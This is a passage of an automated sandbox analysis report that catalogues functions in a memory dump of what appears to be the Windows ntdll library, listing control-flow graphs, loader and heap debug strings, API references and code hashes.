379ca98f 1500->1501 1502 379ca99b-379ca99d 1500->1502 1501->1498 1502->1474
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: HEAP:
                                                        • API String ID: 3446177414-2466845122
                                                        • Opcode ID: 57495584fbc32cf050dc155f439a870674b489592eae3b913f61700685898cbd
                                                        • Instruction ID: cadf5eac3b0fc1b1bf24d79533deb2b77f7eb1a0ee9070256a4d989693e03fc8
                                                        • Opcode Fuzzy Hash: 57495584fbc32cf050dc155f439a870674b489592eae3b913f61700685898cbd
                                                        • Instruction Fuzzy Hash: 7FA1A175A143128FDB04CE28C8D1A1AB7E5FF88368F05466DE945DB321EB74EC46CB92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1503 37927630-37927651 1504 37927653-3792766f call 378fe660 1503->1504 1505 3792768b-37927699 call 37934c30 1503->1505 1510 37927675-37927682 1504->1510 1511 37964638 1504->1511 1512 37927684 1510->1512 1513 3792769a-379276a9 call 37927818 1510->1513 1514 3796463f-37964645 1511->1514 1512->1505 1521 37927701-3792770a 1513->1521 1522 379276ab-379276c1 call 379277cd 1513->1522 1516 379276c7-379276d0 call 37927728 1514->1516 1517 3796464b-379646b8 call 3797f290 call 37939020 RtlDebugPrintTimes BaseQueryModuleData 1514->1517 1516->1521 1528 379276d2 1516->1528 1517->1516 1535 379646be-379646c6 1517->1535 1526 379276d8-379276e1 1521->1526 1522->1514 1522->1516 1530 379276e3-379276f2 call 3792771b 1526->1530 1531 3792770c-3792770e 1526->1531 1528->1526 1534 379276f4-379276f6 1530->1534 1531->1534 1537 37927710-37927719 1534->1537 1538 379276f8-379276fa 1534->1538 1535->1516 1539 379646cc-379646d3 1535->1539 1537->1538 1538->1512 1540 379276fc 1538->1540 1539->1516 1541 379646d9-379646e4 1539->1541 1542 379647be-379647d0 call 37932c50 1540->1542 1544 379646ea-37964723 call 3797f290 call 3793aaa0 1541->1544 1545 379647b9 call 37934d48 1541->1545 1542->1512 1552 37964725-37964736 call 3797f290 1544->1552 1553 3796473b-3796476b call 3797f290 1544->1553 1545->1542 1552->1521 1553->1516 1558 37964771-3796477f call 3793a770 1553->1558 1561 37964786-379647a3 call 3797f290 call 3796cf9e 1558->1561 1562 37964781-37964783 1558->1562 1561->1516 1567 379647a9-379647b2 1561->1567 1562->1561 1567->1558 1568 379647b4 1567->1568 1568->1516
                                                        Strings
                                                        • Execute=1, xrefs: 37964713
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 37964655
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 37964787
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 37964725
                                                        • ExecuteOptions, xrefs: 379646A0
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 37964742
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 379646FC
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 769d3413dba8b8140cbce844485957662eabf5a7e09e5624e188b4f491aca40d
                                                        • Instruction ID: 103aa40b95e84e29ce3923fd16db07a420e1fe6f4fcffb8577b39e96d68d0d1f
                                                        • Opcode Fuzzy Hash: 769d3413dba8b8140cbce844485957662eabf5a7e09e5624e188b4f491aca40d
                                                        • Instruction Fuzzy Hash: 50512975A0021DAEEB10EAA4DC89FA973BCAF0431CF40039DD604B7291DB71AA45DF56
                                                        Strings
                                                        • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 37957AE6
                                                        • Actx , xrefs: 37957A0C, 37957A73
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 379579D5
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 379579D0, 379579F5
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 379579FA
                                                        • SsHd, xrefs: 3790A3E4
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                        • API String ID: 0-1988757188
                                                        • Opcode ID: 9bbe0ca84b12adfa7fe7ee17ebb50da50d7cc61764d8fdab7c572be79ef4c082
                                                        • Instruction ID: ffa07628eb5790f62d24daf99a5985fe8eb2101f5f2a6995227a5ef04fff6912
                                                        • Opcode Fuzzy Hash: 9bbe0ca84b12adfa7fe7ee17ebb50da50d7cc61764d8fdab7c572be79ef4c082
                                                        • Instruction Fuzzy Hash: 0FE1B1796143028FE714CE24C8D4B1AB7E5FB84368F504B2DE855CB291DB71E989CF92
                                                        APIs
                                                        Strings
                                                        • GsHd, xrefs: 3790D874
                                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 37959565
                                                        • Actx , xrefs: 37959508
                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 37959346
                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 37959341, 37959366
                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 3795936B
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                        • API String ID: 3446177414-2196497285
                                                        • Opcode ID: 4a54fe95d1455f371fffee150f2ea86f1ce28d8a0ea8d722788847b84b860db8
                                                        • Instruction ID: b69ede4e4a414759484e8be335314ac7212a2e70c6f38884691f7fb89eebaf80
                                                        • Opcode Fuzzy Hash: 4a54fe95d1455f371fffee150f2ea86f1ce28d8a0ea8d722788847b84b860db8
                                                        • Instruction Fuzzy Hash: D8E18CB46143128FE710CF54C880B1AB7E9BB8936CF444B6DE895AB281D771E945CF82
                                                        APIs
                                                        • RtlDebugPrintTimes.NTDLL ref: 378E656C
                                                          • Part of subcall function 378E65B5: RtlDebugPrintTimes.NTDLL ref: 378E6664
                                                          • Part of subcall function 378E65B5: RtlDebugPrintTimes.NTDLL ref: 378E66AF
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 37949A11, 37949A3A
                                                        • apphelp.dll, xrefs: 378E6496
                                                        • LdrpInitShimEngine, xrefs: 379499F4, 37949A07, 37949A30
                                                        • Getting the shim user exports failed with status 0x%08lx, xrefs: 37949A01
                                                        • Loading the shim user DLL failed with status 0x%08lx, xrefs: 37949A2A
                                                        • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 379499ED
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-204845295
                                                        • Opcode ID: 40beb9aa355d69f8f6f00921322d5599ba09da02775991932dcb4317c627b606
                                                        • Instruction ID: b3b35f7f54bfc630394c4031e6ca84c98dd27b64c73407077200e46cffc4fd66
                                                        • Opcode Fuzzy Hash: 40beb9aa355d69f8f6f00921322d5599ba09da02775991932dcb4317c627b606
                                                        • Instruction Fuzzy Hash: 6351C1722183049FE320DF24D841B9B77ECEB89768F400A69F595A7661DB34E904CB93
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                        • API String ID: 3446177414-4227709934
                                                        • Opcode ID: c9f93dc853e25b5312f7cbedcb47b305a8b7e06560a686b45bca4e9179ed04af
                                                        • Instruction ID: dcecab603672788bb8bb3c8008faed3338d336249d95377b966a8d7cc1c22df4
                                                        • Opcode Fuzzy Hash: c9f93dc853e25b5312f7cbedcb47b305a8b7e06560a686b45bca4e9179ed04af
                                                        • Instruction Fuzzy Hash: 54416EB9901209EFDB01DF99D984ADEBBBABF48328F100359E904A7341D775AD11DB90
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                        • API String ID: 3446177414-3492000579
                                                        • Opcode ID: 6c5f8d7314753b044ae209d947ff27666c2027370ef7f5ff5ed1bc00f1f268a9
                                                        • Instruction ID: a5751719d63556c247d1138d44f15e6770f4ffacc6cf14c707b8c8507a4b10d1
                                                        • Opcode Fuzzy Hash: 6c5f8d7314753b044ae209d947ff27666c2027370ef7f5ff5ed1bc00f1f268a9
                                                        • Instruction Fuzzy Hash: CB71ED31915249DFEB01CFA8D440AEDFBF6FF4A318F048269E440AB662D7399941CB41
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 37949AC5, 37949B06
                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37949AF6
                                                        • LdrpLoadShimEngine, xrefs: 37949ABB, 37949AFC
                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 37949AB4
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-3589223738
                                                        • Opcode ID: 9bd705fae044c4008b77b3f2f80b093a2373bd1030409b6e77fbe2971d6432bf
                                                        • Instruction ID: e21e712b768067e46aef714b9d942804d776fe6d6ed76c32a5b71658a0ff7879
                                                        • Opcode Fuzzy Hash: 9bd705fae044c4008b77b3f2f80b093a2373bd1030409b6e77fbe2971d6432bf
                                                        • Instruction Fuzzy Hash: DD5123727243489FEB04DFA8CC45B9D77BABB55328F040365E450BB6A2CB68AC41CB91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                        • API String ID: 3446177414-3224558752
                                                        • Opcode ID: 165e88b03e052cdb8e4080d123647ab1680c41f68204274c27f2dabceb046fe3
                                                        • Instruction ID: c90ff9923249df687e30740ced779686dfaf7542f0c4e32b973e33644f0bfc04
                                                        • Opcode Fuzzy Hash: 165e88b03e052cdb8e4080d123647ab1680c41f68204274c27f2dabceb046fe3
                                                        • Instruction Fuzzy Hash: 23416775501759EFE711CF28C485B6AB7B9EF01378F108369E40167791CB78E881CB82
                                                        APIs
                                                        Strings
                                                        • Entry Heap Size , xrefs: 3799F26D
                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3799F263
                                                        • ---------------------------------------, xrefs: 3799F279
                                                        • HEAP: , xrefs: 3799F15D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                        • API String ID: 3446177414-1102453626
                                                        • Opcode ID: c3117d014f14bd283541ff297557f7743dedb2b5248d830652a370f69d9b4c9f
                                                        • Instruction ID: cde8b016262858f6964d7079ecfe5b3a47241b317ee3f27ba7a133aad0c6ecc3
                                                        • Opcode Fuzzy Hash: c3117d014f14bd283541ff297557f7743dedb2b5248d830652a370f69d9b4c9f
                                                        • Instruction Fuzzy Hash: B5419079A10215DFE714CF18D880A99BBFAEF4A3687158279E408AB721D735EC42CF80
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                        • API String ID: 3446177414-1222099010
                                                        • Opcode ID: f149959cec39ec6b5170e91314c135a318e3fad2408f7c035b685580127a0911
                                                        • Instruction ID: e36b3ebdee562d5170d3db235b5f4de824a6740e4c03ac8f2d4be8a52a37524f
                                                        • Opcode Fuzzy Hash: f149959cec39ec6b5170e91314c135a318e3fad2408f7c035b685580127a0911
                                                        • Instruction Fuzzy Hash: FF310839105798DFE722DB28C405F59B7EDEF12778F004694F85157B51CBA8A881CF92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction ID: 4570fc92c4c1613f099c098973c9c576a4e3b41b445c57ead28c18843ab39b21
                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction Fuzzy Hash: 6981D078E072498EFB148E68C8517EEBBAAEF4437DF54431AD851A7792C73498408F51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$@
                                                        • API String ID: 3446177414-1194432280
                                                        • Opcode ID: ccb0fa7fd50a8b6ed8bbebd7bf4a1609ab39184b6be87d123db27ed3bd360e50
                                                        • Instruction ID: 66d10f870c1f53486343de3833c6e0daafaf9433d549eb1f2397557fd715a75f
                                                        • Opcode Fuzzy Hash: ccb0fa7fd50a8b6ed8bbebd7bf4a1609ab39184b6be87d123db27ed3bd360e50
                                                        • Instruction Fuzzy Hash: 02813AB5D006699FDB21CF54CC44BEEB7B8AB08764F0042EAE919B7240D7749E85CFA1
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 37963640, 3796366C
                                                        • LdrpFindDllActivationContext, xrefs: 37963636, 37963662
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 3796365C
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3796362F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-3779518884
                                                        • Opcode ID: ff8089cd73adc35b0d13066b02a22666eb8818ebe264ca10235c51729964058b
                                                        • Instruction ID: 6ee6826924dca2c927376097faeaa03775938839d91f4606a8d9116e46446b3b
                                                        • Opcode Fuzzy Hash: ff8089cd73adc35b0d13066b02a22666eb8818ebe264ca10235c51729964058b
                                                        • Instruction Fuzzy Hash: 3E313C7A900719DEFB61FB04C849B6572ACBB0A7BCF424366D40467674DBA0BC80E7D2
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 3795A9A2
                                                        • LdrpDynamicShimModule, xrefs: 3795A998
                                                        • apphelp.dll, xrefs: 37912462
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3795A992
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        • Opcode ID: 6d99db01e03c8515862215aa0ffc52841b88fcdcf0dca85eae5a74d8869b98cb
                                                        • Instruction ID: e80975b91147c48d280a3cfa87f916f4aaae8fa256d98ff923d7f673321d9628
                                                        • Opcode Fuzzy Hash: 6d99db01e03c8515862215aa0ffc52841b88fcdcf0dca85eae5a74d8869b98cb
                                                        • Instruction Fuzzy Hash: 28314A75654315EBFB10DF58DC81B6A7BB9FB88778F110369E9007B660C7785842CB81
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: f5f40adba0fecf5bd642eaa9bb33dafd57678865923dd2ee9d7cfdf816161d0f
                                                        • Instruction ID: f2a53dffe48318d3428b6509a46fa7e2bfe5b2d45fdb96d5d2d985d58b7240ad
                                                        • Opcode Fuzzy Hash: f5f40adba0fecf5bd642eaa9bb33dafd57678865923dd2ee9d7cfdf816161d0f
                                                        • Instruction Fuzzy Hash: CC21A7B6D01119ABD750DF79CC40EEE77FCEF94258F450226E904E7201E734E9118BA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 3446177414-3610490719
                                                        • Opcode ID: 256b7081029e8b81e72e8de3fc85b1df61f37065c3ea81755bdc4425c5dcaad7
                                                        • Instruction ID: a20667669ae7ff2640f0261c15013d937b8381d447cf67750b757836e8e50b6c
                                                        • Opcode Fuzzy Hash: 256b7081029e8b81e72e8de3fc85b1df61f37065c3ea81755bdc4425c5dcaad7
                                                        • Instruction Fuzzy Hash: D9912671704741DFE755DF25C880B2AB7ADBF966A8F000659F8909BB81DB38E841CB93
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 3795A121
                                                        • Failed to allocated memory for shimmed module list, xrefs: 3795A10F
                                                        • LdrpCheckModule, xrefs: 3795A117
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-161242083
                                                        • Opcode ID: 19cbc1bf45abc3cdc782c1c770347e120062cb515a18e6791e6ef611c46aa598
                                                        • Instruction ID: 2baefa892c14c27b8889aa3f5884e38ab51365360012992e6d9084d8e0a47163
